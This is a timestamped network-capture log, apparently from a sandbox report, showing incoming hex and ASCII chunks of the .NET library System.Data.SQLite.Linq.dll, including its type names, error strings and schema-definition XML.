2023-11-18 09:02:37 UTC	633	IN	Data Raw: 00 00 00 00 81 00 61 33 1a 12 90 00 9e 33 00 00 00 00 81 00 34 1e 26 12 91 00 ac 33 00 00 00 00 81 08 60 30 2d 12 92 00 b9 33 00 00 00 00 81 08 95 19 29 00 92 00 d5 33 00 00 00 00 83 08 85 29 32 12 92 00 dd 33 00 00 00 00 83 08 5a 29 32 12 92 00 e8 33 00 00 00 00 81 00 e9 18 3c 12 92 00 64 34 00 00 00 00 91 00 9f 2b 4d 12 94 00 f0 34 00 00 00 00 91 00 60 2b 4d 12 94 00 78 37 00 00 00 00 91 00 ef 27 58 12 94 00 44 39 00 00 00 00 91 00 45 36 58 12 94 00 bc 39 00 00 00 00 81 18 6c 27 62 12 94 00 d8 39 00 00 00 00 93 00 7d 17 68 12 95 00 60 3a 00 00 00 00 81 00 7d 17 7c 12 99 00 04 3b 00 00 00 00 81 00 b9 17 83 12 9a 00 74 3b 00 00 00 00 81 00 9b 17 8e 12 9c 00 c0 3b 00 00 00 00 81 00 c0 18 94 12 9d 00 9c 3d 00 00 00 00 c6 00 f5 2e 9e 12 9f 00 b5 3d 00 00 00 Data Ascii: a334&3`0-3)3)23Z)23<d4+M4`+Mx7'XD9E6X9l'b9}h`:}\|;t;;=.=
2023-11-18 09:02:37 UTC	634	IN	Data Raw: 01 58 65 00 00 00 00 81 00 b8 2a a3 14 1a 01 e0 65 00 00 00 00 81 00 1f 17 ae 14 1b 01 ec 65 00 00 00 00 81 00 1f 17 b7 14 1e 01 60 66 00 00 00 00 81 00 6b 2d c1 14 22 01 04 67 00 00 00 00 81 00 7b 30 cf 14 24 01 14 67 00 00 00 00 81 00 7b 30 dd 14 28 01 ca 67 00 00 00 00 91 00 d0 29 ec 14 2d 01 dc 67 00 00 00 00 91 00 59 0f f3 14 2e 01 00 68 00 00 00 00 81 00 6e 0b f9 14 30 01 6c 6a 00 00 00 00 81 00 43 1d f6 12 31 01 a9 6a 00 00 00 00 81 00 10 1e fd 10 32 01 c0 6a 00 00 00 00 81 00 fa 18 fd 10 33 01 e2 6a 00 00 00 00 81 00 a8 1b fd 10 34 01 10 6b 00 00 00 00 81 00 c3 1d fd 10 35 01 38 6b 00 00 00 00 81 00 a8 07 00 15 36 01 a0 6c 00 00 00 00 81 00 13 2d 09 15 38 01 c6 6c 00 00 00 00 81 00 44 03 09 15 3a 01 02 6d 00 00 00 00 93 00 e5 24 12 15 3c 01 24 6d Data Ascii: Xe*ee`fk-"g{0$g{0(g)-gY.hn0ljC1j2j3j4k58k6l-8lD:m$<$m
2023-11-18 09:02:37 UTC	635	IN	Data Raw: 42 0f 9b 01 f6 7b 00 00 00 00 86 18 6c 27 06 00 9d 01 fe 7b 00 00 00 00 c6 00 13 04 4b 16 9d 01 0b 7c 00 00 00 00 c6 00 03 24 51 16 9d 01 18 7c 00 00 00 00 c6 00 b7 1f 57 16 9d 01 25 7c 00 00 00 00 c6 00 47 24 5d 16 9d 01 32 7c 00 00 00 00 c6 00 37 26 63 16 9d 01 3f 7c 00 00 00 00 c6 00 8e 25 69 16 9d 01 4c 7c 00 00 00 00 e6 01 31 05 6e 16 9d 01 0d 7d 00 00 00 00 e6 01 05 0e 06 00 9e 01 1c 7d 00 00 00 00 81 00 73 03 06 00 9e 01 3b 7d 00 00 00 00 81 00 05 0e 15 00 9e 01 4c 7d 00 00 00 00 c4 00 9e 12 06 00 9f 01 7c 7d 00 00 00 00 91 18 72 27 38 0f 9f 01 88 7d 00 00 00 00 86 18 6c 27 10 00 9f 01 a6 7d 00 00 00 00 91 00 0d 33 75 16 a0 01 b4 7d 00 00 00 00 91 00 6a 19 12 15 a0 01 05 7e 00 00 00 00 91 00 4f 19 7b 16 a1 01 10 7e 00 00 00 00 83 00 0f 2b 86 16 a2 Data Ascii: B{l'{K\|$Q\|W%\|G$]2\|7&c?\|%iL\|1n}}s;}L}\|}r'8}l'}3u}j~O{~+
2023-11-18 09:02:37 UTC	637	IN	Data Raw: 00 e6 11 9a 18 f9 01 2b 96 00 00 00 00 c6 00 f5 2e a4 18 fb 01 4a 96 00 00 00 00 c6 00 f5 2e ab 18 fc 01 78 96 00 00 00 00 c6 00 f5 2e b2 18 fd 01 ac 96 00 00 00 00 c6 00 f5 2e b9 18 fe 01 03 97 00 00 00 00 c6 00 f5 2e c0 18 ff 01 1c 97 00 00 00 00 c6 00 f5 2e c7 18 00 02 30 97 00 00 00 00 c6 00 f5 2e ce 18 01 02 98 97 00 00 00 00 81 00 28 36 d5 18 02 02 ec 97 00 00 00 00 86 18 6c 27 01 00 04 02 08 98 00 00 00 00 e1 01 f2 0d 06 00 05 02 40 98 00 00 00 00 e1 01 eb 34 29 00 05 02 fc 98 00 00 00 00 81 00 43 01 06 00 05 02 16 99 00 00 00 00 e1 09 63 31 12 0b 05 02 ba 43 00 00 00 00 e1 01 4f 2e 06 00 05 02 1e 99 00 00 00 00 e1 09 9e 31 39 00 05 02 2c 99 00 00 00 00 e1 01 c5 26 fb 0c 05 02 7b 99 00 00 00 00 e1 01 02 27 4e 00 05 02 83 99 00 00 00 00 86 18 6c 27 Data Ascii: +.J.x....0.(6l'@4)Cc1CO.19,&{'Nl'
2023-11-18 09:02:37 UTC	638	IN	Data Raw: 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 fd 0e 00 00 01 00 57 34 00 00 01 00 b5 27 00 00 01 00 c5 1e 00 00 01 00 32 13 00 00 01 00 57 34 00 00 01 00 57 34 00 00 01 00 10 25 00 00 02 00 57 34 00 00 01 00 66 0e 00 00 01 00 57 34 00 00 01 00 b5 27 00 00 01 00 aa 12 00 00 02 00 53 2a 00 00 01 00 22 33 00 00 01 00 22 33 00 00 02 00 49 06 02 00 03 00 1e 2c 02 00 04 00 fe 0a 00 00 01 00 49 Data Ascii: W4'2W4W4%W4fW4'S*"3"3I,I
2023-11-18 09:02:37 UTC	639	IN	Data Raw: 52 2d 00 00 02 00 9c 04 00 00 03 00 03 14 00 00 04 00 75 21 00 00 01 00 bd 30 00 00 02 00 7a 2f 00 00 03 00 e5 34 00 00 04 00 85 32 00 00 01 00 aa 12 00 00 01 00 b9 2e 00 00 02 00 e5 2e 00 00 03 00 af 26 00 00 01 00 aa 12 00 00 01 00 aa 12 00 00 01 00 aa 12 00 00 01 00 aa 12 00 00 02 00 c1 08 00 00 01 00 aa 12 00 00 02 00 7a 2f 00 00 01 00 aa 12 00 00 01 00 aa 12 00 00 01 00 da 2b 00 00 02 00 aa 12 00 00 01 00 aa 12 00 00 02 00 81 2c 00 00 01 00 1b 19 00 00 02 00 aa 12 00 00 01 00 1b 19 00 00 02 00 aa 12 00 00 01 00 1b 19 00 00 02 00 aa 12 00 00 01 00 1b 19 00 00 02 00 aa 12 00 00 01 00 1b 19 00 00 02 00 aa 12 00 00 01 00 1b 19 00 00 02 00 aa 12 00 00 01 00 1b 19 00 00 02 00 aa 12 00 00 01 00 1b 19 00 00 02 00 aa 12 00 00 01 00 1b 19 00 00 02 00 aa 12 00 Data Ascii: R-u!0z/42..&z/+,
2023-11-18 09:02:37 UTC	640	IN	Data Raw: 32 00 00 01 00 66 12 00 00 01 00 7e 2d 00 00 01 00 11 35 00 00 02 00 3d 06 00 00 03 00 30 2a 00 00 04 00 d9 04 00 00 01 00 66 12 00 00 02 00 83 0c 00 00 01 00 66 12 00 00 02 00 e7 0a 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 01 00 c5 1e 00 00 Data Ascii: 2f~-5=0*ff
2023-11-18 09:02:37 UTC	641	IN	Data Raw: cb 02 49 03 35 29 dd 02 dc 00 07 12 ef 02 51 03 b8 11 39 00 31 05 b3 2d f8 02 61 05 6c 27 10 00 31 01 4d 2c 04 03 e4 00 07 12 ef 02 59 03 b8 11 39 00 59 03 63 03 29 00 f1 03 1e 2b 16 03 61 03 c8 2f 29 00 ec 00 21 27 45 00 f4 00 bd 31 34 00 61 03 fa 08 c7 00 31 05 08 37 42 03 fc 00 21 27 45 00 31 05 89 2a 5f 03 31 03 1d 08 c7 00 f9 04 1c 0d 6c 03 19 05 49 14 72 03 81 05 53 0f 10 00 04 01 6c 27 06 00 04 01 40 03 d2 01 04 01 13 32 e8 00 04 01 21 27 b8 01 0c 01 bd 31 34 00 81 05 53 0f 93 03 61 05 6c 27 06 00 0c 01 eb 34 29 00 1c 00 6c 27 06 00 49 01 73 2c 98 03 51 01 2b 19 98 03 51 01 22 19 98 03 51 01 e9 0d 90 00 61 01 47 2d a8 03 99 01 94 2e 90 00 99 01 be 2e 90 00 91 00 2e 0c b7 03 e9 02 74 08 c7 00 a1 01 db 34 9c 00 a1 01 7f 0e 90 00 a9 01 73 2c 98 03 b1 Data Ascii: I5)Q91-al'1M,Y9Yc)+a/)!'E14a17B!'E1*_1lIrSl'@2!'14Sal'4)l'Is,Q+Q"QaG-...t4s,
2023-11-18 09:02:37 UTC	643	IN	Data Raw: 00 59 04 6c 27 6e 09 31 06 c2 11 73 06 91 04 23 14 75 09 39 06 7c 29 8b 09 91 04 b0 35 93 09 39 06 0d 0e a0 09 91 04 b3 18 a0 09 a1 05 11 19 ba 04 b1 04 83 21 26 06 b1 04 b3 13 26 06 b1 04 99 21 26 06 41 06 6c 27 10 00 31 05 92 2f c7 00 59 04 82 0b bf 09 44 02 07 12 6d 01 49 06 6c 27 10 00 31 01 a1 06 d5 09 31 01 8a 06 de 09 31 01 8a 06 e9 09 31 01 5c 06 f9 09 31 01 74 06 08 0a 31 01 74 06 14 0a 31 01 cc 06 1f 0a 31 01 cc 06 2a 0a 59 04 48 0b bf 09 44 02 5e 18 3b 02 e4 00 5e 18 b4 04 51 06 09 36 57 0a 51 06 20 18 5d 0a 69 04 ae 0e 64 0a 81 04 ce 21 73 0a 31 04 00 35 10 00 31 04 ee 0a b6 0a a9 03 0e 2c bd 0a 54 02 21 27 45 00 5c 02 bd 31 34 00 69 02 0e 2c eb 0a 64 02 a8 35 34 00 6c 02 07 12 ef 02 b9 04 14 08 c7 00 b9 04 4e 06 10 01 b9 04 79 05 07 0b 61 06 Data Ascii: Yl'n1s#u9\|)59!&&!&Al'1/YDmIl'1111\1t1t11*YHD^;^Q6WQ ]id!s151,T!'E\14i,d54lNya
2023-11-18 09:02:37 UTC	644	IN	Data Raw: 00 00 66 2c 78 19 00 00 47 37 46 19 00 00 64 30 80 19 00 00 99 19 46 19 00 00 89 29 85 19 00 00 5e 29 85 19 00 00 25 2e 46 19 00 00 ca 2c 32 19 00 00 9b 2c 32 19 00 00 ec 2c 8f 19 00 00 52 23 9a 19 00 00 38 23 9f 19 00 00 f7 2d a4 19 00 00 a9 18 a4 19 00 00 dc 0c a4 19 00 00 44 35 a4 19 00 00 58 35 a4 19 00 00 6e 34 46 19 00 00 e6 2f a9 19 00 00 d4 2a 3b 19 00 00 62 13 46 19 00 00 3c 33 46 19 00 00 f7 09 ad 19 00 00 be 09 ad 19 00 00 7e 0c b1 19 00 00 f1 28 46 19 00 00 4c 32 73 19 00 00 d5 24 b7 19 00 00 3c 0d bd 19 00 00 50 02 c3 19 00 00 6a 02 c3 19 00 00 12 2c c7 19 00 00 38 2a d0 19 00 00 05 31 dc 19 00 00 3c 31 e1 19 00 00 05 31 dc 19 00 00 3c 31 e1 19 02 00 0f 00 03 00 01 00 10 00 03 00 02 00 11 00 05 00 02 00 12 00 07 00 01 00 13 00 07 00 02 00 14 Data Ascii: f,xG7Fd0F)^)%.F,2,2,R#8#-D5X5n4F/;bF<3F~(FL2s$<Pj,81<11<1
2023-11-18 09:02:37 UTC	645	IN	Data Raw: 3e 64 5f 5f 31 31 00 3c 3e 39 5f 5f 33 31 5f 31 00 3c 54 72 79 54 72 61 6e 73 6c 61 74 65 49 6e 74 6f 49 6e 3e 62 5f 5f 33 31 5f 31 00 4e 75 6c 6c 61 62 6c 65 60 31 00 49 45 6e 75 6d 65 72 61 62 6c 65 60 31 00 53 74 61 63 6b 60 31 00 49 43 6f 6c 6c 65 63 74 69 6f 6e 60 31 00 52 65 61 64 4f 6e 6c 79 4d 65 74 61 64 61 74 61 43 6f 6c 6c 65 63 74 69 6f 6e 60 31 00 52 65 61 64 4f 6e 6c 79 43 6f 6c 6c 65 63 74 69 6f 6e 60 31 00 4c 69 73 74 45 6c 65 6d 65 6e 74 48 61 6e 64 6c 65 72 60 31 00 49 43 6f 6d 70 61 72 65 72 60 31 00 49 45 71 75 61 6c 69 74 79 43 6f 6d 70 61 72 65 72 60 31 00 54 6f 53 74 72 69 6e 67 43 6f 6e 76 65 72 74 65 72 60 31 00 49 45 6e 75 6d 65 72 61 74 6f 72 60 31 00 44 62 45 78 70 72 65 73 73 69 6f 6e 56 69 73 69 74 6f 72 60 31 00 49 4c 69 73 Data Ascii: >d__11<>9__31_1<TryTranslateIntoIn>b__31_1Nullable`1IEnumerable`1Stack`1ICollection`1ReadOnlyMetadataCollection`1ReadOnlyCollection`1ListElementHandler`1IComparer`1IEqualityComparer`1ToStringConverter`1IEnumerator`1DbExpressionVisitor`1ILis
2023-11-18 09:02:37 UTC	647	IN	Data Raw: 65 00 54 72 79 47 65 74 49 73 55 6e 69 63 6f 64 65 00 69 73 55 6e 69 63 6f 64 65 00 6d 6f 64 65 00 44 62 43 6f 6d 6d 61 6e 64 54 72 65 65 00 44 62 55 70 64 61 74 65 43 6f 6d 6d 61 6e 64 54 72 65 65 00 44 62 44 65 6c 65 74 65 43 6f 6d 6d 61 6e 64 54 72 65 65 00 44 62 4d 6f 64 69 66 69 63 61 74 69 6f 6e 43 6f 6d 6d 61 6e 64 54 72 65 65 00 44 62 46 75 6e 63 74 69 6f 6e 43 6f 6d 6d 61 6e 64 54 72 65 65 00 44 62 49 6e 73 65 72 74 43 6f 6d 6d 61 6e 64 54 72 65 65 00 44 62 51 75 65 72 79 43 6f 6d 6d 61 6e 64 54 72 65 65 00 5f 63 6f 6d 6d 61 6e 64 54 72 65 65 00 74 72 65 65 00 67 65 74 5f 54 79 70 65 55 73 61 67 65 00 43 72 65 61 74 65 44 61 74 65 54 69 6d 65 54 79 70 65 55 73 61 67 65 00 43 72 65 61 74 65 53 74 72 69 6e 67 54 79 70 65 55 73 61 67 65 00 43 72 65 Data Ascii: eTryGetIsUnicodeisUnicodemodeDbCommandTreeDbUpdateCommandTreeDbDeleteCommandTreeDbModificationCommandTreeDbFunctionCommandTreeDbInsertCommandTreeDbQueryCommandTree_commandTreetreeget_TypeUsageCreateDateTimeTypeUsageCreateStringTypeUsageCre
2023-11-18 09:02:37 UTC	651	IN	Data Raw: 63 68 65 6d 61 44 65 66 69 6e 69 74 69 6f 6e 2e 63 73 64 6c 00 53 79 73 74 65 6d 2e 44 61 74 61 2e 53 51 4c 69 74 65 2e 53 51 4c 69 74 65 50 72 6f 76 69 64 65 72 53 65 72 76 69 63 65 73 2e 53 74 6f 72 65 53 63 68 65 6d 61 44 65 66 69 6e 69 74 69 6f 6e 2e 73 73 64 6c 00 53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 4f 62 6a 65 63 74 4d 6f 64 65 6c 00 53 79 73 74 65 6d 2e 43 6f 6d 70 6f 6e 65 6e 74 4d 6f 64 65 6c 00 53 74 72 69 6e 67 55 74 69 6c 00 53 79 73 74 65 6d 2e 44 61 74 61 2e 53 51 4c 69 74 65 2e 4c 69 6e 71 2e 64 6c 6c 00 46 69 6c 6c 00 44 42 4e 75 6c 6c 00 53 79 73 74 65 6d 2e 58 6d 6c 00 53 79 73 74 65 6d 2e 44 61 74 61 2e 53 51 4c 69 74 65 2e 53 51 4c 69 74 65 50 72 6f 76 69 64 65 72 53 65 72 76 69 63 65 73 2e 50 72 6f 76 69 64 65 72 Data Ascii: chemaDefinition.csdlSystem.Data.SQLite.SQLiteProviderServices.StoreSchemaDefinition.ssdlSystem.Collections.ObjectModelSystem.ComponentModelStringUtilSystem.Data.SQLite.Linq.dllFillDBNullSystem.XmlSystem.Data.SQLite.SQLiteProviderServices.Provider
2023-11-18 09:02:37 UTC	655	IN	Data Raw: 6e 54 72 61 6e 73 6c 61 74 6f 72 00 74 72 61 6e 73 6c 61 74 6f 72 00 73 65 70 61 72 61 74 6f 72 00 49 45 6e 75 6d 65 72 61 74 6f 72 00 53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 47 65 6e 65 72 69 63 2e 49 45 6e 75 6d 65 72 61 62 6c 65 3c 54 56 61 6c 75 65 3e 2e 47 65 74 45 6e 75 6d 65 72 61 74 6f 72 00 53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 49 45 6e 75 6d 65 72 61 62 6c 65 2e 47 65 74 45 6e 75 6d 65 72 61 74 6f 72 00 44 6d 6c 53 71 6c 47 65 6e 65 72 61 74 6f 72 00 73 71 6c 47 65 6e 65 72 61 74 6f 72 00 48 61 6e 64 6c 65 53 70 65 63 69 61 6c 46 75 6e 63 74 69 6f 6e 54 6f 4f 70 65 72 61 74 6f 72 00 2e 63 74 6f 72 00 2e 63 63 74 6f 72 00 56 69 73 69 74 43 6f 6c 6c 65 63 74 69 6f 6e 43 6f 6e 73 74 72 75 63 74 6f 72 00 44 62 45 Data Ascii: nTranslatortranslatorseparatorIEnumeratorSystem.Collections.Generic.IEnumerable<TValue>.GetEnumeratorSystem.Collections.IEnumerable.GetEnumeratorDmlSqlGeneratorsqlGeneratorHandleSpecialFunctionToOperator.ctor.cctorVisitCollectionConstructorDbE
2023-11-18 09:02:37 UTC	659	IN	Data Raw: 6c 69 74 79 00 53 79 73 74 65 6d 2e 44 61 74 61 2e 45 6e 74 69 74 79 00 49 73 4e 75 6c 6c 4f 72 45 6d 70 74 79 00 67 65 74 5f 49 73 45 6d 70 74 79 00 67 65 74 5f 50 72 6f 70 65 72 74 79 00 54 72 79 47 65 74 56 61 6c 75 65 46 6f 72 4d 65 74 61 64 61 74 61 50 72 6f 70 65 72 74 79 00 45 64 6d 50 72 6f 70 65 72 74 79 00 00 00 1d 55 00 70 00 64 00 61 00 74 00 65 00 46 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 00 0f 55 00 50 00 44 00 41 00 54 00 45 00 20 00 00 09 53 00 45 00 54 00 20 00 00 05 2c 00 20 00 00 07 20 00 3d 00 20 00 00 09 20 00 3d 00 20 00 30 00 00 0d 57 00 48 00 45 00 52 00 45 00 20 00 00 03 3b 00 00 1d 44 00 65 00 6c 00 65 00 74 00 65 00 46 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 00 19 44 00 45 00 4c 00 45 00 54 00 45 00 20 00 46 00 52 00 Data Ascii: litySystem.Data.EntityIsNullOrEmptyget_IsEmptyget_PropertyTryGetValueForMetadataPropertyEdmPropertyUpdateFunctionUPDATE SET , = = 0WHERE ;DeleteFunctionDELETE FR
2023-11-18 09:02:37 UTC	663	IN	Data Raw: 75 00 74 00 63 00 27 00 29 00 01 80 81 44 00 41 00 54 00 45 00 50 00 41 00 52 00 54 00 20 00 61 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 20 00 74 00 6f 00 20 00 66 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 27 00 7b 00 30 00 7d 00 2e 00 7b 00 31 00 7d 00 27 00 20 00 6d 00 75 00 73 00 74 00 20 00 62 00 65 00 20 00 61 00 20 00 6c 00 69 00 74 00 65 00 72 00 61 00 6c 00 20 00 73 00 74 00 72 00 69 00 6e 00 67 00 01 80 8b 7b 00 30 00 7d 00 27 00 20 00 69 00 73 00 20 00 6e 00 6f 00 74 00 20 00 61 00 20 00 76 00 61 00 6c 00 69 00 64 00 20 00 76 00 61 00 6c 00 75 00 65 00 20 00 66 00 6f 00 72 00 20 00 44 00 41 00 54 00 45 00 50 00 41 00 52 00 54 00 20 00 61 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 20 00 69 00 6e 00 20 00 27 00 7b 00 31 00 7d 00 2e Data Ascii: utc')DATEPART argument to function '{0}.{1}' must be a literal string{0}' is not a valid value for DATEPART argument in '{1}.
2023-11-18 09:02:37 UTC	667	IN	Data Raw: 65 00 73 00 00 0f 62 00 69 00 6e 00 64 00 69 00 6e 00 67 00 00 1d 65 00 78 00 70 00 72 00 65 00 73 00 73 00 69 00 6f 00 6e 00 4c 00 69 00 73 00 74 00 00 11 66 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 00 09 62 00 6f 00 64 00 79 00 00 81 5d 55 00 6e 00 61 00 62 00 6c 00 65 00 20 00 74 00 6f 00 20 00 75 00 70 00 64 00 61 00 74 00 65 00 20 00 74 00 68 00 65 00 20 00 45 00 6e 00 74 00 69 00 74 00 79 00 53 00 65 00 74 00 20 00 27 00 7b 00 30 00 7d 00 27 00 20 00 62 00 65 00 63 00 61 00 75 00 73 00 65 00 20 00 69 00 74 00 20 00 68 00 61 00 73 00 20 00 61 00 20 00 44 00 65 00 66 00 69 00 6e 00 69 00 6e 00 67 00 51 00 75 00 65 00 72 00 79 00 20 00 61 00 6e 00 64 00 20 00 6e 00 6f 00 20 00 3c 00 7b 00 31 00 7d 00 3e 00 20 00 65 00 6c 00 65 00 6d 00 65 00 6e 00 Data Ascii: esbindingexpressionListfunctionbody]Unable to update the EntitySet '{0}' because it has a DefiningQuery and no <{1}> elemen
2023-11-18 09:02:37 UTC	671	IN	Data Raw: 1d 0e 12 82 4d 08 12 82 4d 12 82 51 08 20 02 12 82 4d 0e 1d 0e 05 20 00 12 83 41 06 20 01 12 82 4d 0e 05 20 00 12 82 51 23 07 0d 12 59 12 82 61 12 82 51 12 82 4d 0e 11 82 65 12 81 8d 12 82 69 11 80 9d 0e 12 81 89 12 82 6d 1d 1c 04 20 01 0e 0e 09 20 03 12 59 12 82 bd 0e 1c 05 20 00 11 82 65 05 20 00 12 83 49 08 00 01 11 80 9d 12 81 75 0c 00 03 0e 12 82 49 11 80 9d 11 82 65 0b 20 05 12 59 12 82 bd 0e 1c 1c 1c 06 20 01 01 12 82 51 06 20 01 01 12 82 6d 06 20 01 08 12 82 4d 04 20 00 1d 1c 07 20 01 12 83 4d 1d 1c 05 20 00 12 83 29 07 20 02 01 0e 12 83 29 07 20 02 0e 0e 12 82 7d 04 07 02 09 08 05 07 01 11 80 9d 05 07 01 12 80 95 0f 07 03 15 12 5d 01 12 80 b5 12 80 b5 12 80 b5 08 15 12 81 71 01 12 80 b5 07 15 12 5d 01 12 80 b5 0c 07 02 15 12 5d 01 12 81 15 12 81 Data Ascii: MMQ M A M Q#YaQMeim Y e IuIe Y Q m M M ) ) }]q]]
2023-11-18 09:02:37 UTC	675	IN	Data Raw: 67 65 74 5f 41 6c 6c 56 61 6c 75 65 73 3e 64 5f 5f 31 31 00 00 04 01 00 00 00 40 01 00 33 53 79 73 74 65 6d 2e 52 65 73 6f 75 72 63 65 73 2e 54 6f 6f 6c 73 2e 53 74 72 6f 6e 67 6c 79 54 79 70 65 64 52 65 73 6f 75 72 63 65 42 75 69 6c 64 65 72 07 34 2e 30 2e 30 2e 30 00 00 e8 07 00 00 ce ca ef be 01 00 00 00 91 00 00 00 6c 53 79 73 74 65 6d 2e 52 65 73 6f 75 72 63 65 73 2e 52 65 73 6f 75 72 63 65 52 65 61 64 65 72 2c 20 6d 73 63 6f 72 6c 69 62 2c 20 56 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 2c 20 43 75 6c 74 75 72 65 3d 6e 65 75 74 72 61 6c 2c 20 50 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 62 37 37 61 35 63 35 36 31 39 33 34 65 30 38 39 23 53 79 73 74 65 6d 2e 52 65 73 6f 75 72 63 65 73 2e 52 75 6e 74 69 6d 65 52 65 73 6f 75 72 63 65 53 65 74 02 00 00 Data Ascii: get_AllValues>d__11@3System.Resources.Tools.StronglyTypedResourceBuilder4.0.0.0lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
2023-11-18 09:02:37 UTC	679	IN	Data Raw: 20 20 20 20 20 20 5b 56 69 65 77 44 65 66 69 6e 69 74 69 6f 6e 5d 0a 20 20 20 20 20 20 20 20 2c 20 20 20 49 53 5f 55 50 44 41 54 41 42 4c 45 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5b 49 73 55 70 64 61 74 61 62 6c 65 5d 0a 20 20 20 20 20 20 20 20 46 52 4f 4d 0a 20 20 20 20 20 20 20 20 54 45 4d 50 2e 53 43 48 45 4d 41 56 49 45 57 53 0a 20 20 20 20 20 20 3c 2f 44 65 66 69 6e 69 6e 67 51 75 65 72 79 3e 0a 20 20 20 20 3c 2f 45 6e 74 69 74 79 53 65 74 3e 0a 0a 20 20 20 20 3c 45 6e 74 69 74 79 53 65 74 20 4e 61 6d 65 3d 22 53 56 69 65 77 43 6f 6c 75 6d 6e 73 22 20 45 6e 74 69 74 79 54 79 70 65 3d 22 53 65 6c 66 2e 56 69 65 77 43 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 3c 44 65 66 69 6e 69 6e 67 51 75 65 72 79 3e 0a 20 20 20 20 20 20 20 20 53 45 4c 45 43 54 Data Ascii: [ViewDefinition] , IS_UPDATABLE [IsUpdatable] FROM TEMP.SCHEMAVIEWS </DefiningQuery> </EntitySet> <EntitySet Name="SViewColumns" EntityType="Self.ViewColumn"> <DefiningQuery> SELECT
2023-11-18 09:02:37 UTC	683	IN	Data Raw: 54 49 41 4c 4c 59 5f 44 45 46 45 52 52 45 44 20 5b 49 73 49 6e 69 74 69 61 6c 6c 79 44 65 66 65 72 72 65 64 5d 0a 20 20 20 20 20 20 20 20 46 52 4f 4d 0a 20 20 20 20 20 20 20 20 54 45 4d 50 2e 53 43 48 45 4d 41 43 4f 4e 53 54 52 41 49 4e 54 53 20 74 63 0a 20 20 20 20 20 20 3c 2f 44 65 66 69 6e 69 6e 67 51 75 65 72 79 3e 0a 20 20 20 20 3c 2f 45 6e 74 69 74 79 53 65 74 3e 0a 0a 20 20 20 20 3c 45 6e 74 69 74 79 53 65 74 20 4e 61 6d 65 3d 22 53 43 68 65 63 6b 43 6f 6e 73 74 72 61 69 6e 74 73 22 20 45 6e 74 69 74 79 54 79 70 65 3d 22 53 65 6c 66 2e 43 68 65 63 6b 43 6f 6e 73 74 72 61 69 6e 74 22 3e 0a 20 20 20 20 20 20 3c 44 65 66 69 6e 69 6e 67 51 75 65 72 79 3e 0a 20 20 20 20 20 20 20 20 53 45 4c 45 43 54 0a 20 20 20 20 20 20 20 20 4e 55 4c 4c 20 5b 49 64 5d Data Ascii: TIALLY_DEFERRED [IsInitiallyDeferred] FROM TEMP.SCHEMACONSTRAINTS tc </DefiningQuery> </EntitySet> <EntitySet Name="SCheckConstraints" EntityType="Self.CheckConstraint"> <DefiningQuery> SELECT NULL [Id]
2023-11-18 09:02:37 UTC	687	IN	Data Raw: 53 65 74 3e 0a 20 20 20 20 3c 41 73 73 6f 63 69 61 74 69 6f 6e 53 65 74 20 4e 61 6d 65 3d 22 53 56 69 65 77 56 69 65 77 43 6f 6e 73 74 72 61 69 6e 74 73 22 20 41 73 73 6f 63 69 61 74 69 6f 6e 3d 22 53 65 6c 66 2e 56 69 65 77 56 69 65 77 43 6f 6e 73 74 72 61 69 6e 74 22 20 3e 0a 20 20 20 20 20 20 3c 45 6e 64 20 52 6f 6c 65 3d 22 50 61 72 65 6e 74 22 20 45 6e 74 69 74 79 53 65 74 3d 22 53 56 69 65 77 73 22 2f 3e 0a 20 20 20 20 20 20 3c 45 6e 64 20 52 6f 6c 65 3d 22 43 6f 6e 73 74 72 61 69 6e 74 22 20 45 6e 74 69 74 79 53 65 74 3d 22 53 56 69 65 77 43 6f 6e 73 74 72 61 69 6e 74 73 22 2f 3e 0a 20 20 20 20 3c 2f 41 73 73 6f 63 69 61 74 69 6f 6e 53 65 74 3e 0a 20 20 20 20 3c 41 73 73 6f 63 69 61 74 69 6f 6e 53 65 74 20 4e 61 6d 65 3d 22 53 56 69 65 77 43 6f 6e Data Ascii: Set> <AssociationSet Name="SViewViewConstraints" Association="Self.ViewViewConstraint" > <End Role="Parent" EntitySet="SViews"/> <End Role="Constraint" EntitySet="SViewConstraints"/> </AssociationSet> <AssociationSet Name="SViewCon
